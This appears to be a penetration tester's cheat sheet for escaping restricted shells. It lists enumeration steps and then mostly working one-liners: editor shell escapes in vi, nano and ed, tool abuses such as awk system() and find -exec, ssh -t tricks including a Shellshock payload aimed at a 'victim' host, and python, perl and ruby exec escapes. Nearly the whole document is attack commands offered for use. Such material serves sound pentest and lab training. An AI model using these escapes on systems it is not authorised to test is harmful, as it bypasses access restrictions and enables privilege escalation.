Breaking Out Of The Jail

You can execute built-in shell commands, as well as the ones in your PATH

Enumerate

  • Get environment variables: env or printenv
  • Any programs as different user: sudo -l
  • Check current PATH: echo $PATH
  • List contents of PATH:
    • ls path/to/PATH
    • echo path/to/PATH/*
  • List export variables: export -p

Research

Research each executable command, look for odd parameters
Check out:

  • man pages
  • GTFOBin
  • Vulnerabilities in the command

Attack Vectors

  • If “/“ is allowed, /bin/bash

Writable PATH

  • If PATH is writable, game on!
    • export PATH=/usr/local/bin:/usr/bin:/bin:$PATH

Editors

  • vi, vim, man, less, more
    1
    2
    3
    4
    :set shell=/bin/bash
    :shell
    # or
    :!/bin/bash
  • nano
    1
    2
    3
    # Control - R, Control - X
    ^R^X
    reset; sh 1>&0 2>&0
  • ed
    !'/bin/sh'

Common Tools

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# cp
cp /bin/sh /current/PATH

# ftp
ftp
ftp>!/bin/sh

# gdb
gdb
(gdb)!/bin/sh

# awk
awk 'BEGIN {system("/bin/bash")}'

# find
find / -name bleh -exec /bin/bash \;

# expect
expect
spawn sh

SSH

1
2
3
4
5
6
7
8
# exec commands before remote shell are loaded
ssh test@victim -t "/bin/sh"

# start ssh without loading any profile
ssh test@victim -t "bash --noprofile"

# try shellshock
ssh test@victim -t "() { :; }; /bin/bash"

Scripting Languages

1
2
3
4
5
6
7
8
# python
python -c 'import os;os.system("/bin/bash")'

# perl
perl -e 'exec "/bin/sh";'

# ruby
ruby -e 'exec /bin/sh'

Writing To a File

1
2
echo "hello world!" | tee hello.sh
echo "append to the same file" | tee -a hello.sh

Resources

SANS
Hacking Articles
Escape From SHELLcatraz